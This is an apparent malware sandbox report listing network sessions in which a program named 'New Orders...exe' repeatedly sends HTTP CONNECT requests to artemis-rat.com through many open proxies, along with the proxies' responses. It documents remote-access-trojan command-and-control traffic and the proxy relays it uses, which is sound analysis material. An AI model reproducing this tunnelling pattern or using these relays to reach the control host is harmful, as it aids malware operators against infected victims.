                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        385192.168.2.95032546.209.207.15380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.566976070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.599033117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.596501112 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        386192.168.2.95128843.153.174.1974437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567032099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        387192.168.2.951024185.49.31.20780817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567240000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        388192.168.2.950486107.180.95.177639517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567326069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.663969994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668421984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773302078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.773363113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:29.773283005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:17.773288012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        389192.168.2.951018148.72.206.84588427672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567414045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        390192.168.2.95042851.158.77.220163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567461967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.688733101 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        391192.168.2.951148104.19.247.62807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567570925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.723584890 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        392192.168.2.95115472.167.38.7154107672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567686081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.132524014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.733726025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824254036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.945236921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148516893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242299080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445398092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.707370996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        393192.168.2.951147162.214.225.223549177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567744017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.038642883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.569999933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664565086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.773427963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.976816893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.164211035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.460966110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.976517916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        394192.168.2.95105345.159.189.24431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567820072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:41.195060968 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        395192.168.2.95044559.15.28.7631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.567872047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.599062920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.617078066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.723241091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.742127895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        396192.168.2.951096187.49.191.149997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568041086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.387209892 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:17:45.549662113 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                        Content-Length: 729
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:17:51 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:17:51 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        397192.168.2.951090184.181.217.21041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568120956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        398192.168.2.95114066.29.128.243105137672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568214893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.202301979 CET24INHTTP/1.1 200 #string


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        399192.168.2.951089130.162.213.17531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568300009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.413929939 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        400192.168.2.95107886.107.179.23431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568344116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.241930962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.242229939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.166979074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.132952929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.519934893 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        401192.168.2.95058272.167.38.7198027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568403959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        402192.168.2.951093121.128.194.154807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568464994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        403192.168.2.95108491.189.177.18831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568538904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.889245987 CET1286INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/5.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3628
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from lb1
                                                                                        X-Cache-Lookup: NONE from lb1:3128
                                                                                        Via: 1.1 lb1 (squid/5.7)
                                                                                        Connection: close
